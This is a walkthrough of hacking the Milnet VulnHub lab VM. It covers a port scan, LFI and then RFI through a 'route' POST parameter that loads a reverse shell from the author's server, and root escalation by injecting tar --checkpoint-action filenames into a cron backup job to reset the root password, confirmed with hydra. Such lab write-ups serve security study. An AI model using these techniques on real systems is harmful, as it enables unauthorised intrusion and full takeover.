Hi Again,
Today i will show you how to PWN Milnet VM from vulnhub.
fire up the machine and run your port scans, only port 22 and 80 are open
Starting Nmap 6.40 ( http://nmap.org ) at 2016-10-29 17:08 EET Nmap scan report for 192.168.1.12 Host is up (0.00019s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh (protocol 2.0) |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) 80/tcp open http lighttpd 1.4.35 |_http-methods: No Allow or Public header in OPTIONS response (status code 200) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port22-TCP:V=6.40%I=7%D=10/29%Time=5814BB75%P=x86_64-pc-linux-gnu%r(NUL SF:L,20,"SSH-2\.0-OpenSSH_7\.2p2\x20Ubuntu-4\r\n"); MAC Address: F4:06:69:8D:72:D7 (Unknown) No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=6.40%E=4%D=10/29%OT=22%CT=1%CU=36331%PV=Y%DS=1%DC=D%G=Y%M=F40669% OS:TM=5814BB83%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=I%TS= OS:8)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%II=I%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11 OS:NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=712 OS:0%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B OS:4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4( OS:R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F OS:=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RI OS:D=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.19 ms 192.168.1.12 OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 32.47 seconds
i had a look on the webpage on port 80
i fired up Burp and i found this
there is a post parameter called route
i suspected a LFI vulnerability and i was right i used the php filter trick to get the source codes
i got all the files source code but unfortunately i didn’t find any lead, also i got the phpinfo file and i found that ALLOW_URL_INCLUDE is ON.
Great we can get an RFI with this configuration, i set up a reverse shell running on my server , and did a post request with parameter route=http://192.168.1.8:8000/shell.php
and i got my self a shell.
looking for an escalation point (fast one), my shell was on / directory , running ls i found folder called backup.
inside this backup i found a backup.sh file owned by root which contain wild card miss configurations, of course i can’t run this file with my privilege but i searched for someone or something who calls this script.
so i looked for backup.sh inside all files in linux system
grep -r "backup.sh" > /tmp/result below is output $ cat /tmp/result var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_xenial_universe_i18n_Translation-en: This package provides the backup, restore, backup.sh, and dump-remind home/langman/SDINET/fips_500_166.txt:system data. Each backup should be checked to ensure that the etc/crontab:*/1 * * * * root /backup/backup.sh usr/sbin/deluser: # if --backup-to is specified, --backup should be set too $
i can find that file is being called in to cron every 1 minute. great easy shell now.
the content of the backup file is
#!/bin/bash cd /var/www/html tar cf /backup/backup.tgz *
The wildcard misconfiguration can allow us to escalate our privilege as tar has an option that can be used to inject linux commands.
i created a file called myshell.sh
file contents
echo "root:password1" | chpasswd
this changes root password.
next i created the parameters that are used to inject files in tar as an empty files in the /var/www/html directory
toutch --checkpoint-action=exec=sh myshell.sh touch --checkpoint=1
Next i run a hydra with for loop on the machine until the password is changed
sakr@HacKeD ~/study/Milnet $ for i in {1..200}; do hydra -l root -p password1 192.168.1.12 ssh; done
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:50
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12 login: root password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:51
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:51
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12 login: root password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:51
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:51
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12 login: root password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:51
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:51
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12 login: root password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:52
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:52
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12 login: root password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:52
That was a fairly easy VM, Hope you enjoyed.